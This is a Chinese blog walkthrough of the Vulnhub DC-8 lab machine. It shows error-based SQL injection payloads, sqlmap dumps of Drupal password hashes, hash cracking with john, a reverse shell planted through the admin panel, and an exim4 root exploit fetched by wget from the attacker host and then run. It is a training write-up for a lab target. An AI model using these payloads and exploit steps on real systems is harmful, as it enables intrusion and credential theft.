Vulnhub靶机:DC8

最新推荐文章于 2024-06-16 19:43:17 发布
最新推荐文章于 2024-06-16 19:43:17 发布
阅读量341 收藏 10
点赞数 8
分类专栏: 靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/136250861
版权

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:DC8(10.0.2.61)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/dc-8,367/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.61

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80

nmap -A 10.0.2.61 -p 1-65535

在这里插入图片描述

打开网站发现是drupal cms

在这里插入图片描述

使用droopescan工具探测drupal的版本为7.67

droopescan scan -u http://10.0.2.61

在这里插入图片描述

也可以直接访问CHANGELOG.txt文件查看版本信息:http://10.0.2.61/CHANGELOG.txt

在这里插入图片描述

使用命令searchsploit Drupal 7.67搜索Drupal 7.67的历史漏洞,都尝试一遍发现利用不了

在这里插入图片描述

查看网站发现?nid=1字段,可以试试是否存在sql注入漏洞

http://10.0.2.61/?nid=1

在这里插入图片描述

直接输入反斜杠,出现数据库报错信息,存在sql注入

在这里插入图片描述

三、漏洞利用

可以尝试报错注入

获取数据库名:
http://10.0.2.61/?nid=1111 and updatexml(1,concat(0x7e,(database()),0x7e),1)

在这里插入图片描述

获取表名:
http://10.0.2.61/?nid=1111 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)

发现进行报错注入时,会出现由于数据的数量过多导致无法一次性显示所有内容

在这里插入图片描述

可以使用mid函数获取完整的数据,MID 函数用于从文本字段中提取字符。

mid函数,第一个参数是要提取的表名,第二个参数为起始位置,第三个参数为返回的字符个数

获取表名:
http://10.0.2.61/?nid=1111 and updatexml(1,concat(0x7e,mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)

由于这个库的表太多了,我直接使用sqlmap跑了,发现users表

sqlmap -u http://10.0.2.61/?nid=1 -D d7db --tables

在这里插入图片描述

获取users表的内容

sqlmap -u http://10.0.2.61/?nid=1 -D d7db -T users --dump

在这里插入图片描述

发现两组用户名密码,其中密码被加密了

admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

将两个密码字段复制到文件passwd.txt,使用john工具暴力破解密码,得到:john:turtle

john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt

在这里插入图片描述

使用爆破得到的用户名密码登录网站

在这里插入图片描述

登录后查看网站后台各个功能点,发现可以执行php代码的地方

在这里插入图片描述

直接在里面添加反弹shell的php代码并保存

在这里插入图片描述

在首页联系我们处添加数据,点击提交即可执行反弹shell的php代码,反弹shell

在这里插入图片描述

在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

执行命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现/usr/sbin/exim4

在这里插入图片描述

查看一下exim4的版本exim4 --version,为4.89

在这里插入图片描述

使用searchsploit搜索exim的历史漏洞,看看也没有可利用的

searchsploit exim

在这里插入图片描述

发现应该符合版本的本地提权漏洞,将该漏洞的exp下载下来,上传到靶机执行

主机执行:
searchsploit -m linux/local/46996.sh
mv 46996.sh /var/www/html/46996.sh
service apache2 start                                    
靶机执行:
cd /tmp
wget http://10.0.2.15/46996.sh
chmod 777 46996.sh
./46996.sh -m netcat

在这里插入图片描述
在这里插入图片描述

查看flag

在这里插入图片描述

huang0c
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶机DC8
不想当脚本小子的脚本小子
01-05 288
信息来一波:先探测存活主机,再查看靶机开发的具体端口信息,发现其开发的80端口和22ssh端口 再访问一下DC8的主页看看: dirbuster扫描后台,没有发现什么特别的地方: 查看robots.txt文件发现了不少东西: 在最后发现了,本来想利用目录穿越漏洞,结果没有: 后来在主页中找到了一个SQL注入漏洞:(点了首页的)几个界面发现只有nid变化,界面不变,本来是想试试../../../../../../etc/passwd,结果报错,这里就是SQL注入,直接SQ
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2409
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 625
Vulnhub靶机:DC-1渗透详细过程
[Vulnhub靶机] DC-1
haosha。的博客
05-07 3981
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1841
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 2968
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
vulnhub靶机:DC-1
Keepb1ue的博客
09-28 1849
文章目录靶机配置说明:靶机环境配置:靶机渗透开始:确定目标ip:端口扫描:常规扫描下目录:msf漏洞利用:切换到交互式shell:获取敏感信息:重置管理员密码:添加管理员用户:suid提权: 靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 (VirtualBox) IP:192.168.56.110 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有详细的靶机说明,而DC-1需要寻找的flag总数为
vulnhub靶机:DC-2
Keepb1ue的博客
09-29 2602
靶机配置说明 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机:DC1 (VirtualBox) IP:192.168.56.111 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中也有详细的靶机说明,而FunBox需要寻找的flag总数为5个 靶机环境配置: 还是一样,将其桥接到同一张网卡即可。 靶机渗透开始: kali IP: 第一步还是需要确定目标IP 确定目标ip为192.168.56.111后nmap扫描下端
Vulnhub靶机:DC-4暴力破解——新手进阶4
m0_75051044的博客
03-22 1319
本次实验使用了两种破解admin用户密码的方式,明显使用hydra更快,使用brupsuite要对字典commompw.txt中7000多个密码进行暴力破解,时间太长了,所以直接用hydra爆破出来的密码登录,再用bruqsuite进行抓包更改命令,最后获取密码字典,然后接着用hydra爆破。显然还是不用bruqsuite更好。使用了两种提权方式,第一种:添加一个无密码用户,并使用teehee执行写入 passwd中,第二种:通过定时任务执行脚本提权。对比一下第一种提权更快。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 701
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 346
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
【网络安全的神秘世界】AppScan安装及使用指南
最新发布
weixin_54750312的博客
06-16 213
动态的web扫描,爬取目标网站的接口、链接,通过扫描器自身的扫描逻辑去发送一些特定的http请求数据包,根据服务端的返回内容来判断存在哪些漏洞。AppScan是一种综合型漏洞扫描工具,采用SaaS解决方案,它将所以测试功能整合到一个服务中,避免了因操作系统不同带来的安装问题。ASoC使用安装在应用程序上的代理,通过监控所有的交互流量,在应用程序运行期间识别安全漏洞。checkmark:非编译扫描,代码是什么样它就什么样。fortify:编译扫描,需要一定的环境依赖。动态分析(DAST)——黑盒扫描。
网络安全(补充)
m0_62207482的博客
06-16 466
网络蠕虫是一种具有自我复制和传播能力、可独立自动运行的恶意程序,属于主动传播。属于被动传播的有计算机病毒、特洛伊木马、逻辑炸弹、细菌、恶意脚本、恶意Active X控件、间谍软件等 文件型病毒系计算机病毒德意志,主要通过感染计算机中的可执行文件(.exe)和命令文件(.com)。把所有通过操作系统的文件系统进行感染的病毒都称作文件病毒。可以感染所有标准的DOS可执行文件:包括批处理文件、DOS下的可加载驱动程序(.SYS)文件以及普通的COM/EXE可执行文件。由于HTML文件无法嵌入二进制执行代码,且是
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值